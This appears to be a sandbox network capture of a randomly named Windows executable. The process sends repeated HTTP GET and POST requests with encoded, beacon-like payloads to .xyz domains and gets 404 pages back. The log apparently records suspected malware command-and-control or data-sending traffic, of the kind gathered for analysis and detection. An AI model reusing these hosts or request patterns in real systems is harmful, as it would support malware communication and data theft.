                                                                  Date: Mon, 18 Nov 2024 12:14:10 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 548
                                                                  Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.7 | 53168 | 176.32.38.130 | 80 | 3736 | C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 13:14:12.127274990 CET | 547 | OUT | GET /aqil/?tD_=f00xUVKh&0PIXBf9=+VwoEzPaDs0s7aELp9mEitaybqlo9Ma6vB91+jO83mkKcBs1X1DQL/6P3P2ZQT9OHqbgLgcpvVmqnE/hn02MtVwUieIUVcwPPIBQaGnRdw6ZzI3y7/51wpZ1zsNtMrZa/5ef5+yRkwqf HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Connection: close
                                                                  Host: www.acc888ommodate.xyz
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Nov 18, 2024 13:14:13.032849073 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 18 Nov 2024 12:14:12 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 548
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  21          192.168.2.7  53169        161.97.142.144  80                3736  C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                  Nov 18, 2024 13:14:18.296999931 CET  807                OUT        POST /zffa/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 220
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.070002018.xyz
                                                                  Origin: http://www.070002018.xyz
                                                                  Referer: http://www.070002018.xyz/zffa/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Raw: 30 50 49 58 42 66 39 3d 47 70 63 30 4a 78 39 32 73 44 58 4c 47 4d 55 76 32 57 46 47 75 6b 38 30 69 2f 6a 55 75 2b 6c 4f 70 6d 74 75 32 45 51 37 70 50 54 76 71 52 4f 42 58 5a 68 2b 30 67 75 62 57 73 33 49 56 2f 59 73 44 72 51 33 72 58 36 59 57 75 4b 68 75 7a 39 72 74 47 63 52 51 58 52 31 64 76 69 6b 4c 78 66 4b 79 68 51 36 79 71 45 78 36 73 30 66 41 71 4e 6c 67 52 57 61 6b 48 50 74 65 39 4d 38 62 78 46 62 55 36 71 48 61 71 56 69 4a 69 6e 49 62 79 41 66 50 34 67 48 72 5a 71 58 61 61 6e 4b 4e 6b 70 43 36 37 75 62 35 41 4c 73 7a 35 43 56 73 67 43 6c 6a 55 42 31 44 38 75 33 64 77 47 79 38 6b 33 49 30 79 73 4f 79 41 70 6a 31 6a 5a 71 37 78 32 32 78 51 3d 3d
                                                                  Data Ascii: 0PIXBf9=Gpc0Jx92sDXLGMUv2WFGuk80i/jUu+lOpmtu2EQ7pPTvqROBXZh+0gubWs3IV/YsDrQ3rX6YWuKhuz9rtGcRQXR1dvikLxfKyhQ6yqEx6s0fAqNlgRWakHPte9M8bxFbU6qHaqViJinIbyAfP4gHrZqXaanKNkpC67ub5ALsz5CVsgCljUB1D8u3dwGy8k3I0ysOyApj1jZq7x22xQ==
                                                                  Nov 18, 2024 13:14:19.154207945 CET  1236               IN         HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 18 Nov 2024 12:14:19 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  ETag: W/"66cce1df-b96"
                                                                  Content-Encoding: gzip
                                                                  Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                  Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                  Nov 18, 2024 13:14:19.154241085 CET  370                IN         Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                  Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  22          192.168.2.7  53170        161.97.142.144  80                3736  C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                  Nov 18, 2024 13:14:20.863195896 CET  827                OUT        POST /zffa/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 240
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.070002018.xyz
                                                                  Origin: http://www.070002018.xyz
                                                                  Referer: http://www.070002018.xyz/zffa/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Raw: 30 50 49 58 42 66 39 3d 47 70 63 30 4a 78 39 32 73 44 58 4c 48 6f 6f 76 7a 31 64 47 2f 45 38 72 2b 50 6a 55 6e 65 6c 30 70 6d 70 75 32 41 49 72 70 64 33 76 71 77 2b 42 57 63 56 2b 7a 67 75 62 64 4d 33 51 52 2f 5a 75 44 72 4d 42 72 57 47 59 57 75 4f 68 75 77 70 72 71 78 77 65 42 58 52 33 49 2f 69 6d 50 78 66 4b 79 68 51 36 79 71 67 4c 36 73 4d 66 44 61 39 6c 68 30 69 5a 74 6e 50 75 4a 4e 4d 38 4b 68 46 66 55 36 71 31 61 76 31 49 4a 6e 6a 49 62 79 77 66 57 4b 45 45 68 5a 71 52 58 36 6d 45 43 30 6c 50 6a 5a 2b 6f 39 52 50 5a 2b 59 71 50 6b 32 44 48 35 32 4e 5a 64 74 57 4d 5a 79 69 45 72 43 71 39 32 7a 6f 57 2f 69 64 43 71 55 38 41 32 6a 58 79 6e 67 50 57 6a 6d 6d 51 44 4d 74 64 79 44 76 6a 61 53 4c 59 37 46 6f 3d
                                                                  Data Ascii: 0PIXBf9=Gpc0Jx92sDXLHoovz1dG/E8r+PjUnel0pmpu2AIrpd3vqw+BWcV+zgubdM3QR/ZuDrMBrWGYWuOhuwprqxweBXR3I/imPxfKyhQ6yqgL6sMfDa9lh0iZtnPuJNM8KhFfU6q1av1IJnjIbywfWKEEhZqRX6mEC0lPjZ+o9RPZ+YqPk2DH52NZdtWMZyiErCq92zoW/idCqU8A2jXyngPWjmmQDMtdyDvjaSLY7Fo=
                                                                  Nov 18, 2024 13:14:21.698690891 CET  1236               IN         HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 18 Nov 2024 12:14:21 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  ETag: W/"66cce1df-b96"
                                                                  Content-Encoding: gzip
                                                                  Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                  Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                  Nov 18, 2024 13:14:21.698707104 CET  370                IN         Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                  Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  23          192.168.2.7  53171        161.97.142.144  80                3736  C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                  Nov 18, 2024 13:14:23.595905066 CET  1840               OUT        POST /zffa/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 1252
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.070002018.xyz
                                                                  Origin: http://www.070002018.xyz
                                                                  Referer: http://www.070002018.xyz/zffa/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Raw: 30 50 49 58 42 66 39 3d 47 70 63 30 4a 78 39 32 73 44 58 4c 48 6f 6f 76 7a 31 64 47 2f 45 38 72 2b 50 6a 55 6e 65 6c 30 70 6d 70 75 32 41 49 72 70 64 2f 76 72 47 71 42 58 2f 39 2b 79 67 75 62 44 38 33 45 52 2f 59 32 44 72 45 64 72 57 4b 49 57 73 47 68 73 53 78 72 72 44 49 65 49 58 52 33 4b 2f 69 6e 4c 78 66 36 79 6c 4d 2b 79 71 77 4c 36 73 4d 66 44 63 5a 6c 31 52 57 5a 68 48 50 74 65 39 4d 77 62 78 45 34 55 36 44 41 61 76 35 79 4a 55 72 49 63 57 55 66 4e 5a 67 45 38 4a 71 54 55 36 6e 5a 43 30 6f 50 6a 5a 53 65 39 52 71 30 2b 5a 65 50 31 51 4f 67 6a 48 42 64 41 39 65 77 51 67 43 43 67 67 47 79 79 43 73 4e 77 6a 74 69 33 6d 4d 30 74 56 7a 6a 74 30 53 7a 36 32 4b 76 61 2b 35 50 38 57 43 35 4f 77 48 4c 6b 42 51 47 41 69 49 72 6b 78 76 49 75 58 70 65 56 77 50 65 70 67 6d 31 49 72 56 4f 64 59 78 63 35 70 46 66 63 75 64 62 4c 79 35 78 56 42 61 77 53 72 56 69 2b 4f 4e 46 62 2f 2b 34 6b 32 57 50 79 49 50 73 4e 32 4d 4f 77 71 49 6d 34 4c 49 52 49 45 72 6c 63 6a 66 50 30 67 79 57 4b 77 2b 30 4a 5a 37 61 39 75 [TRUNCATED]
                                                                  Data Ascii: 0PIXBf9=Gpc0Jx92sDXLHoovz1dG/E8r+PjUnel0pmpu2AIrpd/vrGqBX/9+ygubD83ER/Y2DrEdrWKIWsGhsSxrrDIeIXR3K/inLxf6ylM+yqwL6sMfDcZl1RWZhHPte9MwbxE4U6DAav5yJUrIcWUfNZgE8JqTU6nZC0oPjZSe9Rq0+ZeP1QOgjHBdA9ewQgCCggGyyCsNwjti3mM0tVzjt0Sz62Kva+5P8WC5OwHLkBQGAiIrkxvIuXpeVwPepgm1IrVOdYxc5pFfcudbLy5xVBawSrVi+ONFb/+4k2WPyIPsN2MOwqIm4LIRIErlcjfP0gyWKw+0JZ7a9u [TRUNCATED]
                                                                  Nov 18, 2024 13:14:24.360114098 CET  1236               IN         HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 18 Nov 2024 12:14:24 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  ETag: W/"66cce1df-b96"
                                                                  Content-Encoding: gzip
                                                                  Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                  Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                  Nov 18, 2024 13:14:24.360138893 CET  370                IN         Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                  Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  24          192.168.2.7  53172        161.97.142.144  80                3736  C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                  Nov 18, 2024 13:14:26.173993111 CET  542                OUT        GET /zffa/?0PIXBf9=Lr0UKEZNgDTJN6gT+Us371Y8hMyDvaQkpz1n9V5B19O6mDyNa8d38Q+pA9qLUvQ8A8Z/r2CCV5OH4hlRsxt9M39/KtueIxj6h2UJ95Aou8NDO7hK3C23zz+4LvY5JlduZs+ECZ1LIizb&tD_=f00xUVKh HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Connection: close
                                                                  Host: www.070002018.xyz
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Nov 18, 2024 13:14:27.024132967 CET  1236               IN         HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 18 Nov 2024 12:14:26 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Content-Length: 2966
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  ETag: "66cce1df-b96"
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                  Nov 18, 2024 13:14:27.024188042 CET  1236               IN         Data Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                  Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                  Nov 18, 2024 13:14:27.024202108 CET  424                IN         Data Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                                  Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"
                                                                  Nov 18, 2024 13:14:27.028852940 CET  274                IN         Data Raw: 6e 69 6d 61 74 65 5f 5f 64 65 6c 61 79 2d 31 73 22 3e 0a 09 09 09 09 09 09 3c 70 3e 4f 6f 70 73 21 20 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 74 68 65 20 70 61 67 65 20 74 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f
                                                                  Data Ascii: nimate__delay-1s"><p>Oops! We couldn't find the page that you're looking for.</p><p>Please check the address and try again.</p><section class="footer"><strong>Error Code:</strong> 404</section></div></div></
